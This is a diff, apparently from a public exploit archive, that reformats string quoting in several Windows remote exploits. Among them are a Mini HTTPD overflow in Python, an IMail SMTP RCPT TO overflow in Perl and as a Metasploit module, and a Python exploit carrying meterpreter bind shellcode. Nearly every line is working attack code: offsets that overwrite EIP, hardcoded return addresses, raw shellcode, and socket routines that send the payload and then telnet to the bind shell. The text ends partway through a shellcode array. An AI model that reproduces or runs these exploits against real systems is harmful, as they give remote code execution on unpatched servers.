-padding = \'A\' * (2029 - (len(d) + len(myip)))
+padding = 'A' * (2029 - (len(d) + len(myip)))
 
 buf = padding + eip + nop + shellcode
 
-s.send(\'%s\\r\\n\' % (buf))
+s.send('%s\r\n' % (buf))
 s.recv(1024)
-print \'Payload sent\'
+print 'Payload sent'
 s.close()
diff --git a/platforms/windows/remote/31814.py b/platforms/windows/remote/31814.py
index f369fabca..3a494845a 100755
--- a/platforms/windows/remote/31814.py
+++ b/platforms/windows/remote/31814.py
@@ -12,7 +12,7 @@
 # This is a slightly more weaponised version of the Mini HTTPD buffer overflow
 # written by Sumit, located here: http://www.exploit-db.com/exploits/31736/
 # I wrote this up because the existing version had a hard-coded payload and
-# didn\'t work on any of my XP boxes.
+# didn't work on any of my XP boxes.
 #
 # The instability of the existing is down to bad chars, and the parent thread
 # killing off the child thread when the thing is still running. This exploit
@@ -27,80 +27,80 @@ import struct, socket, sys, subprocess
 
 # Helper function that reads the body of files off disk.
 def file_content(path):
-  with open(path, \'rb\') as f:
+  with open(path, 'rb') as f:
     return f.read()
 
 # Sent the payload in the correct format to the target host/port.
 def pwn(host, port, payload):
-  print \"[*] Connecting to {0}:{1}...\".format(host, port)
+  print "[*] Connecting to {0}:{1}...".format(host, port)
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((host, port))
-  print \"[*] Connected, sending payload {0} bytes...\".format(len(payload))
-  payload = \"POST /{0} HTTP/1.1\\r\\nHost: {1}\\r\\n\\r\\n\".format(payload, host)
+  print "[*] Connected, sending payload {0} bytes...".format(len(payload))
+  payload = "POST /{0} HTTP/1.1\r\nHost: {1}\r\n\r\n".format(payload, host)
   s.send(payload)
   s.shutdown
   s.close
-  print \"[+] Payload of {0} bytes sent, hopefully your shellcode executed.\".format(len(payload))
+  print "[+] Payload of {0} bytes sent, hopefully your shellcode executed.".format(len(payload))
 
 # Create the part of the payload creates a thread to run the final payload in.
 def create_payload_thread(final_payload_size):
-  VirtualAlloc = struct.pack(\"<L\", 0x7c809AE1)   # in kernel32
-  CreateThread = struct.pack(\"<L\", 0x7c8106c7)   # in kernel32
-  SuspendThread = struct.pack(\"<L\", 0x7c83974A)  # in kernel32
+  VirtualAlloc = struct.pack("<L", 0x7c809AE1)   # in kernel32
+  CreateThread = struct.pack("<L", 0x7c8106c7)   # in kernel32
+  SuspendThread = struct.pack("<L", 0x7c83974A)  # in kernel32
 
-  payload  = \"\"
-  payload += \"\\x83\\xec\\x02\"   # add esp, 0x2 (aligns the stack)
-  payload += \"\\x89\\xe6\"       # mov esi, esp
-  payload += \"\\x83\\xc6\\x00\"   # add esi, <some offset filled later>
+  payload  = ""
+  payload += "\x83\xec\x02"   # add esp, 0x2 (aligns the stack)
+  payload += "\x89\xe6"       # mov esi, esp
+  payload += "\x83\xc6\x00"   # add esi, <some offset filled later>
   count_offset = len(payload) - 1
 
   # zero out ebx because we use zero a lot
-  payload += \"\\x31\\xdb\"             # xor ebx,ebx
+  payload += "\x31\xdb"             # xor ebx,ebx
 
   # allocate some memory to store our shellcode in which is
   # away from the current active area and somewhere safe
-  payload += \"\\x6a\\x40\"             # push 0x40
-  payload += \"\\x68\\x00\\x30\\x00\\x00\" # push 0x3000
-  payload += \"\\x68\\x00\\x10\\x00\\x00\" # push 0x1000
-  payload += \"\\x53\"                 # push ebx
-  payload += \"\\xB8\" + VirtualAlloc  # mov eax,<address>
-  payload += \"\\xff\\xd0\"             # call eax
+  payload += "\x6a\x40"             # push 0x40
+  payload += "\x68\x00\x30\x00\x00" # push 0x3000
+  payload += "\x68\x00\x10\x00\x00" # push 0x1000
+  payload += "\x53"                 # push ebx
+  payload += "\xB8" + VirtualAlloc  # mov eax,<address>
+  payload += "\xff\xd0"             # call eax
 
   # copy the payload over to the newly allocated area
-  size_bin = struct.pack(\"<L\", final_payload_size + 4)
-  payload += \"\\xb9\" + size_bin      # mov ecx,final_payload_size
-  payload += \"\\x89\\xc7\"             # mov edi,eax
-  payload += \"\\xf2\\xa4\"             # rep movsb
+  size_bin = struct.pack("<L", final_payload_size + 4)
+  payload += "\xb9" + size_bin      # mov ecx,final_payload_size
+  payload += "\x89\xc7"             # mov edi,eax
+  payload += "\xf2\xa4"             # rep movsb
 
   # create the thread with a starting address pointing to the
   # allocated area of memory
-  payload += \"\\x53\"                 # push ebx
-  payload += \"\\x53\"                 # push ebx
-  payload += \"\\x53\"                 # push ebx
-  payload += \"\\x50\"                 # push eax
-  payload += \"\\x53\"                 # push ebx
-  payload += \"\\x53\"                 # push ebx
-  payload += \"\\xB8\" + CreateThread  # mov eax,<address>
-  payload += \"\\xff\\xd0\"             # call eax
+  payload += "\x53"                 # push ebx
+  payload += "\x53"                 # push ebx
+  payload += "\x53"                 # push ebx
+  payload += "\x50"                 # push eax
+  payload += "\x53"                 # push ebx
+  payload += "\x53"                 # push ebx
+  payload += "\xB8" + CreateThread  # mov eax,<address>
+  payload += "\xff\xd0"             # call eax
 
   # We call SuspendThread on the current thread, because this
   # forces the parent to kill it. The bonus here is that doing
   # so prevents the thread from dying and bringing the whole
   # process down.
-  payload += \"\\x4b\"                 # dec ebx
-  payload += \"\\x4b\"                 # dec ebx
-  payload += \"\\x53\"                 # push ebx
-  payload += \"\\xB8\" + SuspendThread # mov eax,<address>
-  payload += \"\\xff\\xd0\"             # call eax
-  payload += \"\\x90\" * 4
+  payload += "\x4b"                 # dec ebx
+  payload += "\x4b"                 # dec ebx
+  payload += "\x53"                 # push ebx
+  payload += "\xB8" + SuspendThread # mov eax,<address>
+  payload += "\xff\xd0"             # call eax
+  payload += "\x90" * 4
 
   # fill in the correct offset so that we point ESI to the
   # right location at the start of the final payload
   size = len(payload) + final_payload_size % 4
 
-  print \"[*] Final stage is {0} bytes.\".format(final_payload_size)
+  print "[*] Final stage is {0} bytes.".format(final_payload_size)
 
-  offset = struct.pack(\"B\", size)
+  offset = struct.pack("B", size)
 
   # write the value to the payload at the right location and return
   return payload[0:count_offset] + offset + payload[count_offset+1:len(payload)]
@@ -108,49 +108,49 @@ def create_payload_thread(final_payload_size):
 # Creates the first stage of the exploit which overwrite EIP to get control.
 def create_stage1():
   eip_offset = 5412
-  jmp_esp = struct.pack(\"<L\", 0x7e4456F7) # JMP ESP in advapi32
+  jmp_esp = struct.pack("<L", 0x7e4456F7) # JMP ESP in advapi32
 
   eip_offset2 = eip_offset + 4
 
-  payload  = \"\"
-  payload += \"A\" * eip_offset    # padding to reach EIP overwrite
+  payload  = ""
+  payload += "A" * eip_offset    # padding to reach EIP overwrite
   payload += jmp_esp             # address to overwrite IP with
-  payload += \"\\x90\"              # alignment
-  payload += \"\\x83\\xEC\\x21\"      # rejig ESP
+  payload += "\x90"              # alignment
+  payload += "\x83\xEC\x21"      # rejig ESP
   return payload
 
 # Create encoded shellcode from the given payload.
 def create_encoded_shellcode(payload):
-  print \"[*] Input payload of {0} bytes received. Encoding...\".format(len(payload))
-  params = [\'msfencode\', \'-e\', \'x86/opt_sub\', \'-t\', \'raw\',
-      \'BufferRegister=ESP\', \'BufferOffset=42\', \'ValidCharSet=filepath\']
+  print "[*] Input payload of {0} bytes received. Encoding...".format(len(payload))
+  params = ['msfencode', '-e', 'x86/opt_sub', '-t', 'raw',
+      'BufferRegister=ESP', 'BufferOffset=42', 'ValidCharSet=filepath']
   encode = subprocess.Popen(params, stdout = subprocess.PIPE, stdin = subprocess.PIPE)
   shellcode, _ = encode.communicate(payload)
-  print \"[*] Shellcode of {0} bytes generated.\".format(len(shellcode))
+  print "[*] Shellcode of {0} bytes generated.".format(len(shellcode))
   return shellcode
 
-print \"\"
-print \"MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial\"
-print \"-----------------------------------------------------\"
-print \"\"
-print \" Note: msfencode must be in the path and Metasploit must be up to date.\"
+print ""
+print "MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial"
+print "-----------------------------------------------------"
+print ""
+print " Note: msfencode must be in the path and Metasploit must be up to date."
 
 if len(sys.argv) != 4:
-  print \"\"
-  print \" Usage: {0} <host> <port> <payloadfile>\".format(sys.argv[0])
-  print \"\"
-  print \"          host : IP/name of the target host.\"
-  print \"          port : Port that the target is running on.\"
-  print \"   payloadfile : A file with the raw payload that is to be run.\"
-  print \"                 This should be the raw, non-encoded output of\"
-  print \"                 a call to msfpayload\"
-  print \"\"
-  print \"   eg. {0} 192.168.1.1 80 reverse_shell_raw.bin\"
-  print \"\"
+  print ""
+  print " Usage: {0} <host> <port> <payloadfile>".format(sys.argv[0])
+  print ""
+  print "          host : IP/name of the target host."
+  print "          port : Port that the target is running on."
+  print "   payloadfile : A file with the raw payload that is to be run."
+  print "                 This should be the raw, non-encoded output of"
+  print "                 a call to msfpayload"
+  print ""
+  print "   eg. {0} 192.168.1.1 80 reverse_shell_raw.bin"
+  print ""
 else:
-  print \"\"
-  print \"   Make sure you have your listeners running!\"
-  print \"\"
+  print ""
+  print "   Make sure you have your listeners running!"
+  print ""
 
   host = sys.argv[1]
   port = int(sys.argv[2])
@@ -159,6 +159,6 @@ else:
   final_stage = file_content(payload_file)
   thread_payload = create_payload_thread(len(final_stage))
   shellcode = create_encoded_shellcode(thread_payload + final_stage)
-  padding = \"A\" * 0x10
+  padding = "A" * 0x10
   pwn(host, port, stage1 + shellcode + padding)
 
diff --git a/platforms/windows/remote/3264.pl b/platforms/windows/remote/3264.pl
index 5fe7c086d..cc8fd449f 100755
--- a/platforms/windows/remote/3264.pl
+++ b/platforms/windows/remote/3264.pl
@@ -9,13 +9,13 @@ use IO::Socket::INET;
 use Switch;
 
 if (@ARGV < 3) {
-print \"--------------------------------------------------------------------\\n\";
-print \"Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\\n\";
-print \" Return address: \\n\";
-print \" o1 - IMail 8.12 Version\\n\";
-print \" o2 - IMail 8.10 Versio\\n\";
-print \" Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \\n\";
-print \"--------------------------------------------------------------------\\n\";
+print "--------------------------------------------------------------------\n";
+print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n";
+print " Return address: \n";
+print " o1 - IMail 8.12 Version\n";
+print " o2 - IMail 8.10 Versio\n";
+print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n";
+print "--------------------------------------------------------------------\n";
 }
 
 use IO::Socket::INET;
@@ -24,86 +24,86 @@ my $host = 10.0.0.2;
 my $port = 25;
 my $reply;
 my $request;
-my $happystack=\"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\";
+my $happystack="\x81\xc4\xff\xef\xff\xff\x44";
 
 
 
 foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
 $eip = $1 if ($_=~/-o(.*)/);
 }
 
 switch ($eip) {
-case 1 { $eip=\"\\xc4\\x91\\x01\\x10\" } # pop eax ret in SmtpDLL.dll for IMail 8.12
-case 2 { $eip=\"\\xc3\\x88\\x01\\x10\" } # pop eax ret in SmtpDLL.dll for IMail 8.10
+case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12
+case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10
 }
 
 
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 
 
-my $shellcode  = \"\\x33\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\x93\".
-\"\\x7b\\xbd\\x36\\x83\\xee\\xfc\\xe2\\xf4\\x6f\\x11\\x56\\x7b\\x7b\\x82\\x42\\xc9\".
-\"\\x6c\\x1b\\x36\\x5a\\xb7\\x5f\\x36\\x73\\xaf\\xf0\\xc1\\x33\\xeb\\x7a\\x52\\xbd\".
-\"\\xdc\\x63\\x36\\x69\\xb3\\x7a\\x56\\x7f\\x18\\x4f\\x36\\x37\\x7d\\x4a\\x7d\\xaf\".
-\"\\x3f\\xff\\x7d\\x42\\x94\\xba\\x77\\x3b\\x92\\xb9\\x56\\xc2\\xa8\\x2f\\x99\\x1e\".
-\"\\xe6\\x9e\\x36\\x69\\xb7\\x7a\\x56\\x50\\x18\\x77\\xf6\\xbd\\xcc\\x67\\xbc\\xdd\".
-\"\\x90\\x57\\x36\\xbf\\xff\\x5f\\xa1\\x57\\x50\\x4a\\x66\\x52\\x18\\x38\\x8d\\xbd\".
-\"\\xd3\\x77\\x36\\x46\\x8f\\xd6\\x36\\x76\\x9b\\x25\\xd5\\xb8\\xdd\\x75\\x51\\x66\".
-\"\\x6c\\xad\\xdb\\x65\\xf5\\x13\\x8e\\x04\\xfb\\x0c\\xce\\x04\\xcc\\x2f\\x42\\xe6\".
-\"\\xfb\\xb0\\x50\\xca\\xa8\\x2b\\x42\\xe0\\xcc\\xf2\\x58\\x50\\x12\\x96\\xb5\\x34\".
-\"\\xc6\\x11\\xbf\\xc9\\x43\\x13\\x64\\x3f\\x66\\xd6\\xea\\xc9\\x45\\x28\\xee\\x65\".
-\"\\xc0\\x28\\xfe\\x65\\xd0\\x28\\x42\\xe6\\xf5\\x13\\xac\\x6a\\xf5\\x28\\x34\\xd7\".
-\"\\x06\\x13\\x19\\x2c\\xe3\\xbc\\xea\\xc9\\x45\\x11\\xad\\x67\\xc6\\x84\\x6d\\x5e\".
-\"\\x37\\xd6\\x93\\xdf\\xc4\\x84\\x6b\\x65\\xc6\\x84\\x6d\\x5e\\x76\\x32\\x3b\\x7f\".
-\"\\xc4\\x84\\x6b\\x66\\xc7\\x2f\\xe8\\xc9\\x43\\xe8\\xd5\\xd1\\xea\\xbd\\xc4\\x61\".
-\"\\x6c\\xad\\xe8\\xc9\\x43\\x1d\\xd7\\x52\\xf5\\x13\\xde\\x5b\\x1a\\x9e\\xd7\\x66\".
-\"\\xca\\x52\\x71\\xbf\\x74\\x11\\xf9\\xbf\\x71\\x4a\\x7d\\xc5\\x39\\x85\\xff\\x1b\".
-\"\\x6d\\x39\\x91\\xa5\\x1e\\x01\\x85\\x9d\\x38\\xd0\\xd5\\x44\\x6d\\xc8\\xab\\xc9\".
-\"\\xe6\\x3f\\x42\\xe0\\xc8\\x2c\\xef\\x67\\xc2\\x2a\\xd7\\x37\\xc2\\x2a\\xe8\\x67\".
-\"\\x6c\\xab\\xd5\\x9b\\x4a\\x7e\\x73\\x65\\x6c\\xad\\xd7\\xc9\\x6c\\x4c\\x42\\xe6\".
-\"\\x18\\x2c\\x41\\xb5\\x57\\x1f\\x42\\xe0\\xc1\\x84\\x6d\\x5e\\x63\\xf1\\xb9\\x69\".
-\"\\xc0\\x84\\x6b\\xc9\\x43\\x7b\\xbd\\x36\";
+my $shellcode  = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
+"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
+"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
+"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
+"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
+"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
+"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
+"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
+"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
+"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
+"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
+"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
+"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
+"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
+"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
+"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
+"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
+"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
+"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
+"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
+"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
+"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
 
 
-my $nop=\"\\x41\"x137;
+my $nop="\x41"x137;
 
-my $buffer = \"RCPT TO:\".\"\\x20\\x3c\\x40\".$eip . \"\\x3a\" .$nop.$happystack.$shellcode.\"\\x4a\\x61\\x63\\x3e\".\"\\n\";
+my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";
 
 
-my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$host, PeerPort=>$port);
-$socket or die \"Cannot connect to host!\\n\";
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
 
 recv($socket, $reply, 1024, 0);
-print \"Response:\" . $reply;
+print "Response:" . $reply;
 
 
-$request = \"EHLO \" . \"\\r\\n\";
+$request = "EHLO " . "\r\n";
 send $socket, $request, 0;
-print \"[+] Sent  EHLO\\n\";
+print "[+] Sent  EHLO\n";
 recv($socket, $reply, 1024, 0);
-print \"Response:\" . $reply;
+print "Response:" . $reply;
 
 
-$request = \"MAIL FROM:\" . \"\\x20\" . \"\\x3c\".\"acaro\". \"\\x40\".\"jervus.it\" . \"\\x3e\" . \"\\r\\n\";
+$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
 send $socket, $request, 0;
-print \"[+] Sent  MAIL FROM\\n\";
+print "[+] Sent  MAIL FROM\n";
 recv($socket, $reply, 1024, 0);
-print \"Response:\" . $reply;
+print "Response:" . $reply;
 
 
 
 
 $request = $buffer;
 send $socket, $request, 0;
-print \"[+] Sent malicius request\\n\";
+print "[+] Sent malicius request\n";
 close $socket;
 
 
 
-print \" + connect on port 4444 of $host ...\\n\";
+print " + connect on port 4444 of $host ...\n";
 sleep(3);
-system(\"telnet $host 4444\");
+system("telnet $host 4444");
 exit;
 
 # milw0rm.com [2007-02-04]
diff --git a/platforms/windows/remote/3265.pm b/platforms/windows/remote/3265.pm
index 53cf3d482..73af667cb 100755
--- a/platforms/windows/remote/3265.pm
+++ b/platforms/windows/remote/3265.pm
@@ -7,127 +7,127 @@
 ##
 
 package Msf::Exploit::imail_smtp_rcpt_overflow;
-use base \"Msf::Exploit\";
+use base "Msf::Exploit";
 use strict;
 use Pex::Text;
 my $advanced = { };
 
 my $info = {
-	\'Name\'    => \'IMail 2006 and 8.x SMTP Stack Overflow Exploit\',
-	\'Version\'  => \'$Revision: 1.0 $\',
-	\'Authors\' => [ \'Jacopo Cervini <acaro [at] jervus.it>\', ],
-	\'Arch\'    => [ \'x86\' ],
-	\'OS\'      => [ \'win32\', \'winnt\', \'win2000\', \'winxp\', \'win2003\'],
-	\'Priv\'    => 1,
+	'Name'    => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
+	'Version'  => '$Revision: 1.0 $',
+	'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
+	'Arch'    => [ 'x86' ],
+	'OS'      => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
+	'Priv'    => 1,
 
-	\'UserOpts\'  =>
+	'UserOpts'  =>
 	  {
-		\'RHOST\' => [1, \'ADDR\', \'The target address\'],
-		\'RPORT\' => [1, \'PORT\', \'The target port\', 25],
-		\'Encoder\'   => [1, \'EncodedPayload\', \'Use Pex!!\'],
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 25],
+		'Encoder'   => [1, 'EncodedPayload', 'Use Pex!!'],
 
 		
 	  },
 
-	\'AutoOpts\'  => { \'EXITFUNC\'  => \'seh\' },
-	\'Payload\' =>
+	'AutoOpts'  => { 'EXITFUNC'  => 'seh' },
+	'Payload' =>
 	  {
-		\'Space\'     => 400,
-		\'BadChars\'  => \"\\x00\\x0d\\x0a\\x20\\x3e\\x22\\x40\",
-		\'Keys\'      => [\'+ws2ord\'],
+		'Space'     => 400,
+		'BadChars'  => "\x00\x0d\x0a\x20\x3e\x22\x40",
+		'Keys'      => ['+ws2ord'],
 		
 
 	  },
 
-	\'Description\'  => Pex::Text::Freeform(qq{
+	'Description'  => Pex::Text::Freeform(qq{
 This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.
-If we send a long strings for RCPT TO command contained within the characters \'@\' and \':\'
+If we send a long strings for RCPT TO command contained within the characters '@' and ':'
 we can overwrite the eip register and exploit the vulnerable smpt service
 }),
 
-	\'Refs\'  =>
+	'Refs'  =>
 	  [
-		[\'BID\', \'19885\'],
-		[\'CVE\', \'2006-4379\'],
-		[\'URL\',   \'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html\'],
+		['BID', '19885'],
+		['CVE', '2006-4379'],
+		['URL',   'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
 	  ],
 
-	\'Targets\' =>
+	'Targets' =>
 	  [
 
-	[\'Universal IMail 8.10\',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
-	[\'Universal IMail 8.12\',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12
+	['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
+	['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12
 
 
 	  ],
 
-	\'DefaultTarget\' => 0,
+	'DefaultTarget' => 0,
 
-	\'Keys\' => [\'smtp\'],
+	'Keys' => ['smtp'],
 
-	\'DisclosureDate\' => \'September 7 2006\',
+	'DisclosureDate' => 'September 7 2006',
   };
 
 sub new {
 	my $class = shift;
-	my $self = $class->SUPER::new({\'Info\' => $info, \'Advanced\' => $advanced}, @_);
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
 
 	return($self);
 }
 
 sub Exploit {
 	my $self = shift;
-	my $target_host = $self->GetVar(\'RHOST\');
-	my $target_port = $self->GetVar(\'RPORT\');
-	my $target_idx  = $self->GetVar(\'TARGET\');
-	my $shellcode   = $self->GetVar(\'EncodedPayload\')->Payload;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
 
 	my $target = $self->Targets->[$target_idx];
 
 
 
-	my $ehlo = \"EHLO \" . \"\\r\\n\";
+	my $ehlo = "EHLO " . "\r\n";
 
-	my $mail_from = \"MAIL FROM:\" . \"\\x20\" . \"\\x3c\".\"acaro\". \"\\x40\".\"jervus.it\" . \"\\x3e\" . \"\\r\\n\";
+	my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
 
 
-	my $pattern = \"\\x20\\x3c\\x40\";
-	$pattern .= pack(\'V\', $target->[1]);
-	$pattern .=\"\\x3a\" . $self->MakeNops((0x1e8-length ($shellcode)));
+	my $pattern = "\x20\x3c\x40";
+	$pattern .= pack('V', $target->[1]);
+	$pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode)));
 	$pattern .= $shellcode;
-	$pattern .= \"\\x4a\\x61\\x63\\x3e\"; 
+	$pattern .= "\x4a\x61\x63\x3e"; 
 
-	my $request = \"RCPT TO: \" . $pattern .\"\\n\";
+	my $request = "RCPT TO: " . $pattern ."\n";
 
-	$self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using pop eax, ret at 0x%.8x...\", $target->[1]));
+	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using pop eax, ret at 0x%.8x...", $target->[1]));
 
 	my $s = Msf::Socket::Tcp->new
 	  (
-		\'PeerAddr\'  => $target_host,
-		\'PeerPort\'  => $target_port,
-		\'LocalPort\' => $self->GetVar(\'CPORT\'),
-		\'SSL\'       => $self->GetVar(\'SSL\'),
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
 	  );
 
 	if ($s->IsError) {
-		$self->PrintLine(\'[*] Error creating socket: \' . $s->GetError);
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
 		return;
 	}
 my $r = $s->Recv(-1, 5);
 
 	$s->Send($ehlo);
-	$self->PrintLine(\"[*] I\'m sending ehlo command\");
-	$self->PrintLine(\"[*] $r\");
+	$self->PrintLine("[*] I'm sending ehlo command");
+	$self->PrintLine("[*] $r");
 	sleep(2);
 		
 	$s->Send($mail_from);
-	$self->PrintLine(\"[*] I\'m sending mail from command\");
+	$self->PrintLine("[*] I'm sending mail from command");
 	$r = $s->Recv(-1, 10);
-	$self->PrintLine(\"[*] $r\");
+	$self->PrintLine("[*] $r");
 	sleep(2);
 
 	$s->Send($request);
-	$self->PrintLine(\"[*] I\'m sending rcpt to command\");
+	$self->PrintLine("[*] I'm sending rcpt to command");
 	sleep(2);
 
 	return;
diff --git a/platforms/windows/remote/33027.py b/platforms/windows/remote/33027.py
index 0e82f63b4..eae5cd697 100755
--- a/platforms/windows/remote/33027.py
+++ b/platforms/windows/remote/33027.py
@@ -12,66 +12,66 @@
 import socket, sys, os, time 
 
 if len(sys.argv) != 3:
-	print \"[*] Uso: %s <Ip Victima> <Puerto> \\n\" % sys.argv[0]
-        print \"[*] Exploit created by Polunchis\"
-        print \"[*] https://www.intrusionlabs.com.mx\"
+	print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
+        print "[*] Exploit created by Polunchis"
+        print "[*] https://www.intrusionlabs.com.mx"
 	sys.exit(0)
 host = sys.argv[1]         
 port = int(sys.argv[2])
  
-#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b \'\\x00\\xff\\x0a\\x0d\\x20\\x40\'
+#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
 shellcode = (
-\"\\x29\\xc9\\x83\\xe9\\xb5\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\"
-\"\\xaa\\x86\\x33\\x5f\\x83\\xee\\xfc\\xe2\\xf4\\x56\\x6e\\xba\\x5f\\xaa\\x86\"
-\"\\x53\\xd6\\x4f\\xb7\\xe1\\x3b\\x21\\xd4\\x03\\xd4\\xf8\\x8a\\xb8\\x0d\\xbe\"
-\"\\x0d\\x41\\x77\\xa5\\x31\\x79\\x79\\x9b\\x79\\x02\\x9f\\x06\\xba\\x52\\x23\"
-\"\\xa8\\xaa\\x13\\x9e\\x65\\x8b\\x32\\x98\\x48\\x76\\x61\\x08\\x21\\xd4\\x23\"
-\"\\xd4\\xe8\\xba\\x32\\x8f\\x21\\xc6\\x4b\\xda\\x6a\\xf2\\x79\\x5e\\x7a\\xd6\"
-\"\\xb8\\x17\\xb2\\x0d\\x6b\\x7f\\xab\\x55\\xd0\\x63\\xe3\\x0d\\x07\\xd4\\xab\"
-\"\\x50\\x02\\xa0\\x9b\\x46\\x9f\\x9e\\x65\\x8b\\x32\\x98\\x92\\x66\\x46\\xab\"
-\"\\xa9\\xfb\\xcb\\x64\\xd7\\xa2\\x46\\xbd\\xf2\\x0d\\x6b\\x7b\\xab\\x55\\x55\"
-\"\\xd4\\xa6\\xcd\\xb8\\x07\\xb6\\x87\\xe0\\xd4\\xae\\x0d\\x32\\x8f\\x23\\xc2\"
-\"\\x17\\x7b\\xf1\\xdd\\x52\\x06\\xf0\\xd7\\xcc\\xbf\\xf2\\xd9\\x69\\xd4\\xb8\"
-\"\\x6d\\xb5\\x02\\xc2\\xb5\\x01\\x5f\\xaa\\xee\\x44\\x2c\\x98\\xd9\\x67\\x37\"
-\"\\xe6\\xf1\\x15\\x58\\x55\\x53\\x8b\\xcf\\xab\\x86\\x33\\x76\\x6e\\xd2\\x63\"
-\"\\x37\\x83\\x06\\x58\\x5f\\x55\\x53\\x63\\x0f\\xfa\\xd6\\x73\\x0f\\xea\\xd6\"
-\"\\x5b\\xb5\\xa5\\x59\\xd3\\xa0\\x7f\\x11\\x02\\x84\\xf9\\xee\\x31\\x5f\\xbb\"
-\"\\xda\\xba\\xb9\\xc0\\x96\\x65\\x08\\xc2\\x44\\xe8\\x68\\xcd\\x79\\xe6\\x0c\"
